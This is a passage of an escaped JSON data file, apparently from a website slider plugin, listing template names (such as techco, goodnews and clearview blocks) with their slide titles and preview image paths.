1\",\"img\":\"interactivewhiteboard\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"interactivewhiteboard\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"interactivewhiteboard\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"interactivewhiteboard\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"interactivewhiteboard\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"interactivewhiteboard\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"interactivewhiteboard\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"interactivewhiteboard\\/slide8.jpg\"}],\"innovation\":[{\"title\":\"Slide 1\",\"img\":\"innovation\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"innovation\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"innovation\\/slide3.jpg\"}],\"dark-fullsite-block-menu\":[{\"title\":\"Slide 1\",\"img\":\"dark-fullsite-block-menu\\/slide1.jpg\"}],\"dark-fullsite-block-1\":[{\"title\":\"Slide 1\",\"img\":\"dark-fullsite-block-1\\/slide1.jpg\"}],\"dark-fullsite-block-2-about\":[{\"title\":\"Slide 1\",\"img\":\"dark-fullsite-block-2-about\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"dark-fullsite-block-2-about\\/slide2.jpg\"}],\"dark-fullsite-block-3-services\":[{\"title\":\"Slide 1\",\"img\":\"dark-fullsite-block-3-services\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"dark-fullsite-block-3-services\\/slide2.jpg\"}],\"dark-fullsite-block-4-products\":[{\"title\":\"Slide 1\",\"img\":\"dark-fullsite-block-4-products\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"dark-fullsite-block-4-products\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"dark-fullsite-block-4-products\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"dark-fullsite-block-4-products\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"dark-fullsite-block-4-products\\/slide5.jpg\"}],\"dark-fullsite-block-5-testimonials\":[{\"title\":\"Slide 1\",\"img\":\"dark-fullsite-block-5-testimonials\\/slide1.jpg\"}],\"dark-fullsite-block-6-callout\":[{\"title\":\"Slide 1\",\"img\":\"dark-fullsite-block-6-callout\\/slide1.jpg\"}],\"dark-fullsite-block-7-footer\":[{\"title\":\"Slide 1\",\"img\":\"dark-fullsite-block-7-footer\\/slide1.jpg\"}],\"fullsite-block-menu\":[{\"title\":\"Slide 1\",\"img\":\"fullsite-block-menu\\/slide1.jpg\"}],\"fullsite-block1\":[{\"title\":\"Slide 1\",\"img\":\"fullsite-block1\\/slide1.jpg\"}],\"fullsite-block-2-about\":[{\"title\":\"Slide 1\",\"img\":\"fullsite-block-2-about\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"fullsite-block-2-about\\/slide2.jpg\"}],\"fullsite-block-3-services\":[{\"title\":\"Slide 1\",\"img\":\"fullsite-block-3-services\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"fullsite-block-3-services\\/slide2.jpg\"}],\"fullsite-block-4-products\":[{\"title\":\"Slide 1\",\"img\":\"fullsite-block-4-products\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"fullsite-block-4-products\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"fullsite-block-4-products\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"fullsite-block-4-products\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"fullsite-block-4-products\\/slide5.jpg\"}],\"fullsite-block-5-testimonials\":[{\"title\":\"Slide 1\",\"img\":\"fullsite-block-5-testimonials\\/slide1.jpg\"}],\"fullsite-block-6-callout\":[{\"title\":\"Slide 1\",\"img\":\"fullsite-block-6-callout\\/slide1.jpg\"}],\"fullsite-block-7-footer\":[{\"title\":\"Slide 1\",\"img\":\"fullsite-block-7-footer\\/slide1.jpg\"}],\"techjournal\":[{\"title\":\"Slide 1\",\"img\":\"techjournal\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"techjournal\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"techjournal\\/slide3.jpg\"}],\"cardealership\":[{\"title\":\"Slide 1\",\"img\":\"cardealership\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"cardealership\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"cardealership\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"cardealership\\/slide4.jpg\"}],\"fullscreenmenu\":[{\"title\":\"Slide 1\",\"img\":\"fullscreenmenu\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"fullscreenmenu\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"fullscreenmenu\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"fullscreenmenu\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"fullscreenmenu\\/slide5.jpg\"}],\"creativefrontpage\":[{\"title\":\"Slide 1\",\"img\":\"creativefrontpage\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"creativefrontpage\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"creativefrontpage\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"creativefrontpage\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"creativefrontpage\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"creativefrontpage\\/slide6.jpg\"},{\"title\":\"Slide 7\",\"img\":\"creativefrontpage\\/slide7.jpg\"},{\"title\":\"Slide 8\",\"img\":\"creativefrontpage\\/slide8.jpg\"}],\"websitebuilder-menu\":[{\"title\":\"Slide 1\",\"img\":\"websitebuilder-menu\\/slide1.jpg\"}],\"websitebuilder-hero\":[{\"title\":\"Slide 1\",\"img\":\"websitebuilder-hero\\/slide1.jpg\"}],\"websitebuilder-clients\":[{\"title\":\"Slide 1\",\"img\":\"websitebuilder-clients\\/slide1.jpg\"}],\"websitebuilder-services\":[{\"title\":\"Slide 1\",\"img\":\"websitebuilder-services\\/slide1.jpg\"}],\"websitebuilder-discover\":[{\"title\":\"Slide 1\",\"img\":\"websitebuilder-discover\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"websitebuilder-discover\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"websitebuilder-discover\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"websitebuilder-discover\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"websitebuilder-discover\\/slide5.jpg\"}],\"websitebuilder-slider\":[{\"title\":\"Slide 1\",\"img\":\"websitebuilder-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"websitebuilder-slider\\/slide2.jpg\"}],\"websitebuilder-calltoaction\":[{\"title\":\"Slide 1\",\"img\":\"websitebuilder-calltoaction\\/slide1.jpg\"}],\"websitebuilder-footer\":[{\"title\":\"Slide 1\",\"img\":\"websitebuilder-footer\\/slide1.jpg\"}],\"focusparallax\":[{\"title\":\"Slide 1\",\"img\":\"focusparallax\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"focusparallax\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"focusparallax\\/slide3.jpg\"}],\"duotone\":[{\"title\":\"Slide 1\",\"img\":\"duotone\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"duotone\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"duotone\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"duotone\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"duotone\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"duotone\\/slide6.jpg\"}],\"r_menu\":[{\"title\":\"Slide 1\",\"img\":\"r_menu\\/slide1.jpg\"}],\"rhero\":[{\"title\":\"Slide 1\",\"img\":\"r_hero\\/slide1.jpg\"}],\"r_about\":[{\"title\":\"Slide 1\",\"img\":\"r_about\\/slide1.jpg\"}],\"r_products\":[{\"title\":\"Slide 1\",\"img\":\"r_products\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"r_products\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"r_products\\/slide3.jpg\"}],\"r_info\":[{\"title\":\"Slide 1\",\"img\":\"r_info\\/slide1.jpg\"}],\"inspirationheader\":[{\"title\":\"Slide 1\",\"img\":\"inspirationheader\\/slide1.jpg\"}],\"magazineposts\":[{\"title\":\"Slide 1\",\"img\":\"magazineposts\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"magazineposts\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"magazineposts\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"magazineposts\\/slide4.jpg\"}],\"explorationheader\":[{\"title\":\"Slide 1\",\"img\":\"explorationheader\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"explorationheader\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"explorationheader\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"explorationheader\\/slide4.jpg\"}],\"typewritereffect\":[{\"title\":\"Slide 1\",\"img\":\"typewritereffect\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"typewritereffect\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"typewritereffect\\/slide3.jpg\"}],\"blendmodeheader\":[{\"title\":\"Slide 1\",\"img\":\"blendmodeheader\\/slide1.jpg\"}],\"themeplicity_menu\":[{\"title\":\"Slide 1\",\"img\":\"themeplicity_menu\\/slide1.jpg\"}],\"themeplicity_header\":[{\"title\":\"Slide 1\",\"img\":\"themeplicity_header\\/slide1.jpg\"}],\"themeplicity_offer\":[{\"title\":\"Slide 1\",\"img\":\"themeplicity_offer\\/slide1.jpg\"}],\"themeplicity_whatwedo\":[{\"title\":\"Slide 1\",\"img\":\"themeplicity_whatwedo\\/slide1.jpg\"}],\"themeplicity_projects\":[{\"title\":\"Slide 1\",\"img\":\"themeplicity_projects\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"themeplicity_projects\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"themeplicity_projects\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"themeplicity_projects\\/slide4.jpg\"},{\"title\":\"themeplicity_projects\\/slide5.jpg\",\"img\":\"Slide 5\"}],\"themeplicity_whatsgreat\":[{\"title\":\"Slide 1\",\"img\":\"themeplicity_whatsgreat\\/slide1.jpg\"}],\"themeplicity_tables\":[{\"title\":\"Slide 1\",\"img\":\"themeplicity_tables\\/slide1.jpg\"}],\"themeplicity_contactform\":[{\"title\":\"Slide 1\",\"img\":\"themeplicity_contactform\\/slide1.jpg\"}],\"themeplicity_footer\":[{\"title\":\"Slide 1\",\"img\":\"themeplicity_footer\\/slide1.jpg\"}],\"NiceAndClean_Menu\":[{\"title\":\"Slide 1\",\"img\":\"NiceAndClean_Menu\\/slide1.jpg\"}],\"NiceAndClean_Header\":[{\"title\":\"Slide 1\",\"img\":\"NiceAndClean_Header\\/slide1.jpg\"}],\"NiceAndClean_Services\":[{\"title\":\"Slide 1\",\"img\":\"NiceAndClean_Services\\/slide1.jpg\"}],\"NiceAndClean_About\":[{\"title\":\"Slide 1\",\"img\":\"NiceAndClean_About\\/slide1.jpg\"}],\"niceandclean_video\":[{\"title\":\"Slide 1\",\"img\":\"niceandclean_video\\/slide1.jpg\"}],\"niceandclean_highlights\":[{\"title\":\"Slide 1\",\"img\":\"niceandclean_highlights\\/slide1.jpg\"}],\"NiceAndClean_Projects\":[{\"title\":\"Slide 1\",\"img\":\"NiceAndClean_Projects\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"NiceAndClean_Projects\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"NiceAndClean_Projects\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"NiceAndClean_Projects\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"NiceAndClean_Projects\\/slide5.jpg\"}],\"niceandclean_textblocks\":[{\"title\":\"Slide 1\",\"img\":\"niceandclean_textblocks\\/slide1.jpg\"}],\"niceandclean_callout\":[{\"title\":\"Slide 1\",\"img\":\"niceandclean_callout\\/slide1.jpg\"}],\"niceandclean_footer\":[{\"title\":\"Slide 1\",\"img\":\"niceandclean_footer\\/slide1.jpg\"}],\"80s\":[{\"title\":\"Slide 1\",\"img\":\"80s\\/slide1.jpg\"}],\"blurslider\":[{\"title\":\"Slide 1\",\"img\":\"blurslider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"blurslider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"blurslider\\/slide3.jpg\"}],\"ComingSoonAddon\":[{\"title\":\"Slide 1\",\"img\":\"ComingSoonAddon\\/slide1.jpg\"}],\"snowaddon\":[{\"title\":\"Slide 1\",\"img\":\"snowaddon\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"snowaddon\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"snowaddon\\/slide3.jpg\"}],\"particle-effect-one\":[{\"title\":\"Slide 1\",\"img\":\"particle-effect-one\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"particle-effect-one\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"particle-effect-one\\/slide3.jpg\"}],\"particle-effect-two\":[{\"title\":\"Slide 1\",\"img\":\"particle-effect-two\\/slide1.jpg\"}],\"particle-effect-three\":[{\"title\":\"Slide 1\",\"img\":\"particle-effect-three\\/slide1.jpg\"}],\"portfolioviewer\":[{\"title\":\"Slide 1\",\"img\":\"portfolioviewer\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"portfolioviewer\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"portfolioviewer\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"portfolioviewer\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"portfolioviewer\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"portfolioviewer\\/slide6.jpg\"}],\"appshowcase\":[{\"title\":\"Slide 1\",\"img\":\"appshowcase\\/slide1.jpg\"}],\"gravitydesign\":[{\"title\":\"Slide 1\",\"img\":\"gravitydesign\\/slide1.jpg\"}],\"404errorpage\":[{\"title\":\"Slide 1\",\"img\":\"404errorpage\\/slide1.jpg\"}],\"carouselgallery\":[{\"title\":\"Slide 1\",\"img\":\"carouselgallery\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"carouselgallery\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"carouselgallery\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"carouselgallery\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"carouselgallery\\/slide5.jpg\"},{\"title\":\"Slide 6\",\"img\":\"carouselgallery\\/slide6.jpg\"}],\"filmstrip\":[{\"title\":\"Slide 1\",\"img\":\"filmstrip\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"filmstrip\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"filmstrip\\/slide3.jpg\"}],\"spaceopera\":[{\"title\":\"Slide 1\",\"img\":\"spaceopera\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"spaceopera\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"spaceopera\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"spaceopera\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"spaceopera\\/slide5.jpg\"}],\"websiteintro\":[{\"title\":\"Slide 1\",\"img\":\"websiteintro\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"websiteintro\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"websiteintro\\/slide3.jpg\"}],\"maskshowcase\":[{\"title\":\"Slide 1\",\"img\":\"maskshowcase\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"maskshowcase\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"maskshowcase\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"maskshowcase\\/slide4.jpg\"}],\"parallaxzoomslices\":[{\"title\":\"Slide 1\",\"img\":\"parallaxzoomslices\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"parallaxzoomslices\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"parallaxzoomslices\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"parallaxzoomslices\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"parallaxzoomslices\\/slide5.jpg\"}],\"doubleexposureeffect\":[{\"title\":\"Slide 1\",\"img\":\"doubleexposureeffect\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"doubleexposureeffect\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"doubleexposureeffect\\/slide3.jpg\"}],\"mountainparallaxheader\":[{\"title\":\"Slide 1\",\"img\":\"mountainparallaxheader\\/slide1.jpg\"}],\"goodnewsmenu\":[{\"title\":\"Slide 1\",\"img\":\"goodnewsmenu\\/slide1.jpg\"}],\"goodnewsheader\":[{\"title\":\"Slide 1\",\"img\":\"goodnewsheader\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"goodnewsheader\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"goodnewsheader\\/slide3.jpg\"}],\"goodnewswhatshot\":[{\"title\":\"Slide 1\",\"img\":\"goodnewswhatshot\\/slide1.jpg\"}],\"goodnewsfeatured\":[{\"title\":\"Slide 1\",\"img\":\"goodnewsfeatured\\/slide1.jpg\"}],\"goodnewsspotlight\":[{\"title\":\"Slide 1\",\"img\":\"goodnewsspotlight\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"goodnewsspotlight\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"goodnewsspotlight\\/slide3.jpg\"}],\"goodnewscarousel\":[{\"title\":\"Slide 1\",\"img\":\"goodnewscarousel\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"goodnewscarousel\\/slide2.jpg\"}],\"goodnewscallout\":[{\"title\":\"Slide 1\",\"img\":\"goodnewscallout\\/slide1.jpg\"}],\"goodnewsfooter\":[{\"title\":\"Slide 1\",\"img\":\"goodnewsfooter\\/slide1.jpg\"}],\"goodnewsmenuback\":[{\"title\":\"Slide 1\",\"img\":\"goodnewsmenuback\\/slide1.jpg\"}],\"goodnewsblogheader\":[{\"title\":\"Slide 1\",\"img\":\"goodnewsblogheader\\/slide1.jpg\"}],\"goodnewsblogcontent\":[{\"title\":\"Slide 1\",\"img\":\"goodnewsblogcontent\\/slide1.jpg\"}],\"goodnewstestimonials\":[{\"title\":\"Slide 1\",\"img\":\"goodnewstestimonials\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"goodnewstestimonials\\/slide2.jpg\"}],\"goodnewsblogfooter\":[{\"title\":\"Slide 1\",\"img\":\"goodnewsblogfooter\\/slide1.jpg\"}],\"beforeafterslider\":[{\"title\":\"Slide 1\",\"img\":\"beforeafterslider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"beforeafterslider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"beforeafterslider\\/slide3.jpg\"}],\"productshowcase\":[{\"title\":\"Slide 1\",\"img\":\"productshowcase\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"productshowcase\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"productshowcase\\/slide3.jpg\"}],\"overexposuretransition\":[{\"title\":\"Slide 1\",\"img\":\"overexposuretransition\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"overexposuretransition\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"overexposuretransition\\/slide3.jpg\"}],\"parallaxscroll\":[{\"title\":\"Slide 1\",\"img\":\"parallaxscroll\\/slide1.jpg\"}],\"techco-menu\":[{\"title\":\"Slide 1\",\"img\":\"techco-menu\\/slide1.jpg\"}],\"techco-header\":[{\"title\":\"Slide 1\",\"img\":\"techco-header\\/slide1.jpg\"}],\"techco-about\":[{\"title\":\"Slide 1\",\"img\":\"techco-about\\/slide1.jpg\"}],\"techco-services\":[{\"title\":\"Slide 1\",\"img\":\"techco-services\\/slide1.jpg\"}],\"techco-video\":[{\"title\":\"Slide 1\",\"img\":\"techco-video\\/slide1.jpg\"}],\"techco-prices\":[{\"title\":\"Slide 1\",\"img\":\"techco-prices\\/slide1.jpg\"}],\"techco-testimonials\":[{\"title\":\"Slide 1\",\"img\":\"techco-testimonials\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"techco-testimonials\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"techco-testimonials\\/slide3.jpg\"}],\"techco-footer\":[{\"title\":\"Slide 1\",\"img\":\"techco-footer\\/slide1.jpg\"}],\"weather\":[{\"title\":\"Slide 1\",\"img\":\"weather\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"weather\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"weather\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"weather\\/slide4.jpg\"}],\"360panorama\":[{\"title\":\"Slide 1\",\"img\":\"360panorama\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"360panorama\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"360panorama\\/slide3.jpg\"}],\"duotone-add-on\":[{\"title\":\"Slide 1\",\"img\":\"duotone-add-on\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"duotone-add-on\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"duotone-add-on\\/slide3.jpg\"}],\"reveal-add-on\":[{\"title\":\"Slide 1\",\"img\":\"reveal-add-on\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"reveal-add-on\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"reveal-add-on\\/slide3.jpg\"}],\"band-tour-poster\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/band-tour-poster\\/slide1.png\"}],\"brewery-slider\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/brewery-slider\\/slide1.png\"},{\"title\":\"Slide 2\",\"img\":\"smartcontent\\/brewery-slider\\/slide2.png\"},{\"title\":\"Slide 3\",\"img\":\"smartcontent\\/brewery-slider\\/slide3.png\"}],\"burgerbar\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/burgerbar\\/slide1.png\"},{\"title\":\"Slide 2\",\"img\":\"smartcontent\\/burgerbar\\/slide2.png\"},{\"title\":\"Slide 3\",\"img\":\"smartcontent\\/burgerbar\\/slide3.png\"}],\"burger-bar-portrait\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/burger-bar-portrait\\/slide1.png\"},{\"title\":\"Slide 2\",\"img\":\"smartcontent\\/burger-bar-portrait\\/slide2.png\"},{\"title\":\"Slide 3\",\"img\":\"smartcontent\\/burger-bar-portrait\\/slide3.png\"}],\"car-rent\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/car-rent\\/slide1.png\"}],\"coffee\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/coffee\\/slide1.png\"},{\"title\":\"Slide 2\",\"img\":\"smartcontent\\/coffee\\/slide2.png\"},{\"title\":\"Slide 3\",\"img\":\"smartcontent\\/coffee\\/slide3.png\"}],\"holiday-advert\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/holiday-advert\\/slide1.png\"}],\"iphone-cases-light\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/iphone-cases-light\\/slide1.png\"}],\"medical\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/medical\\/slide1.png\"},{\"title\":\"Slide 2\",\"img\":\"smartcontent\\/medical\\/slide2.png\"}],\"mexican-grill\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/mexican-grill\\/slide1.png\"},{\"title\":\"Slide 2\",\"img\":\"smartcontent\\/mexican-grill\\/slide2.png\"},{\"title\":\"Slide 3\",\"img\":\"smartcontent\\/mexican-grill\\/slide3.png\"}],\"mobile-retail-slider\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/mobile-retail-slider\\/slide1.png\"},{\"title\":\"Slide 2\",\"img\":\"smartcontent\\/mobile-retail-slider\\/slide2.png\"},{\"title\":\"Slide 3\",\"img\":\"smartcontent\\/mobile-retail-slider\\/slide3.png\"}],\"money-exchange\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/money-exchange\\/slide1.png\"},{\"title\":\"Slide 2\",\"img\":\"smartcontent\\/money-exchange\\/slide2.png\"},{\"title\":\"Slide 3\",\"img\":\"smartcontent\\/money-exchange\\/slide3.png\"}],\"restaurant-menu-first-screen\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/restaurant-menu-first-screen\\/slide1.png\"}],\"restaurant-menu-second-screen\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/restaurant-menu-second-screen\\/slide1.png\"}],\"restaurant-menu-third-screen\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/restaurant-menu-third-screen\\/slide1.png\"}],\"shoes-store\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/shoes-store\\/slide1.png\"},{\"title\":\"Slide 2\",\"img\":\"smartcontent\\/shoes-store\\/slide2.png\"},{\"title\":\"Slide 3\",\"img\":\"smartcontent\\/shoes-store\\/slide3.png\"}],\"supermarket-products\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/supermarket-products\\/slide1.png\"},{\"title\":\"Slide 2\",\"img\":\"smartcontent\\/supermarket-products\\/slide2.png\"},{\"title\":\"Slide 3\",\"img\":\"smartcontent\\/supermarket-products\\/slide3.png\"},{\"title\":\"Slide 4\",\"img\":\"smartcontent\\/supermarket-products\\/slide4.png\"},{\"title\":\"Slide 5\",\"img\":\"smartcontent\\/supermarket-products\\/slide5.png\"}],\"travel-insurance\":[{\"title\":\"Slide 1\",\"img\":\"smartcontent\\/travel-insurance\\/slide1.png\"}],\"cryptoslider\":[{\"title\":\"Slide 1\",\"img\":\"cryptoslider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"cryptoslider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"cryptoslider\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"cryptoslider\\/slide4.jpg\"}],\"immersion_header\":[{\"title\":\"Slide 1\",\"img\":\"immersion_header\\/slide1.jpg\"}],\"immersion-mountains\":[{\"title\":\"Slide 1\",\"img\":\"immersion-mountains\\/slide1.jpg\"}],\"immersion-product\":[{\"title\":\"Slide 1\",\"img\":\"immersion-product\\/slide1.jpg\"}],\"immersion-design\":[{\"title\":\"Slide 1\",\"img\":\"immersion-design\\/slide1.jpg\"}],\"immersion-photography\":[{\"title\":\"Slide 1\",\"img\":\"immersion-photography\\/slide1.jpg\"}],\"immersion-grid\":[{\"title\":\"Slide 1\",\"img\":\"immersion-grid\\/slide1.jpg\"}],\"funkyslider\":[{\"title\":\"Slide 1\",\"img\":\"funkyslider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"funkyslider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"funkyslider\\/slide3.jpg\"}],\"clearview_menu\":[{\"title\":\"Slide 1\",\"img\":\"clearview_menu\\/slide1.jpg\"}],\"clearview_header\":[{\"title\":\"Slide 1\",\"img\":\"clearview_header\\/slide1.jpg\"}],\"clearview_mission\":[{\"title\":\"Slide 1\",\"img\":\"clearview_mission\\/slide1.jpg\"}],\"clear-view-slider\":[{\"title\":\"Slide 1\",\"img\":\"clear-view-slider\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"clear-view-slider\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"clear-view-slider\\/slide3.jpg\"}],\"clear-view-news\":[{\"title\":\"Slide 1\",\"img\":\"clear-view-news\\/slide1.jpg\"}],\"clear-view-clients\":[{\"title\":\"Slide 1\",\"img\":\"clear-view-clients\\/slide1.jpg\"}],\"clear-view-contact\":[{\"title\":\"Slide 1\",\"img\":\"clear-view-contact\\/slide1.jpg\"}],\"clear-view-single-menu\":[{\"title\":\"Slide 1\",\"img\":\"clear-view-single-menu\\/slide1.jpg\"}],\"clear-view-single-header\":[{\"title\":\"Slide 1\",\"img\":\"clear-view-single-header\\/slide1.jpg\"}],\"clear-view-single-media\":[{\"title\":\"Slide 1\",\"img\":\"clear-view-single-media\\/slide1.jpg\"}],\"clear-view-single-more\":[{\"title\":\"Slide 1\",\"img\":\"clear-view-single-more\\/slide1.jpg\"}],\"clear-view-single-contact\":[{\"title\":\"Slide 1\",\"img\":\"clear-view-single-contact\\/slide1.jpg\"}],\"cleanlandingpage\":[{\"title\":\"Slide 1\",\"img\":\"cleanlandingpage\\/slide1.jpg\"}],\"clearcut\":[{\"title\":\"Slide 1\",\"img\":\"clearcut\\/slide1.jpg\"},{\"title\":\"Slide 2\",\"img\":\"clearcut\\/slide2.jpg\"},{\"title\":\"Slide 3\",\"img\":\"clearcut\\/slide3.jpg\"},{\"title\":\"Slide 4\",\"img\":\"clearcut\\/slide4.jpg\"},{\"title\":\"Slide 5\",\"img\":\"clearcut\\/slide5.jpg\"},{\"title\":\"Slide 